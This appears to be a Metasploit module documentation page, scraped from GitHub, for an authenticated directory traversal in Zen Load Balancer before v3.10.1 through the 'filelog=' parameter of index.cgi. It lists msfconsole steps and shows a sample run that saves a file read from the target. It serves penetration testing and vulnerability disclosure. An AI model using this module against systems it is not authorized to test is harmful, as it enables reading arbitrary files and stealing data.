Description

Zen load balancer before v3.10.1 is vulnerable to authenticated directory traversal. The flaw exists in 'index.cgi' not properly handling 'filelog=' parameter which allows a malicious actor to load arbitrary file path.

Vulnerable Application

Vulnerable ISO

Verification Steps

./msfconsole -q
set RHOSTS <rhost>
set RPORT <rport>
set FILEPATH <filepath>
set ssl <true/false>
set HttpPassword <admin>
set HttpUsername <admin>
run

Scenarios

msf5 > use auxiliary/scanner/http/zenload_balancer_traversal 
msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set RHOSTS 192.168.1.101
RHOSTS => 192.168.1.101
msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set SSL true 
SSL => true
msf5 auxiliary(scanner/http/zenload_balancer_traversal) > run
[*] Running module against 192.168.1.101

[+] File saved in: /Users/Dhiraj/.msf4/loot/20200412142620_default_192.168.1.101_zenload.http_196293.txt
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/zenload_balancer_traversal) >

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

zenload_balancer_traversal.md

zenload_balancer_traversal.md

Description

Vulnerable Application

Verification Steps

Scenarios

Files

zenload_balancer_traversal.md

Latest commit

History

zenload_balancer_traversal.md

File metadata and controls

Description

Vulnerable Application

Verification Steps

Scenarios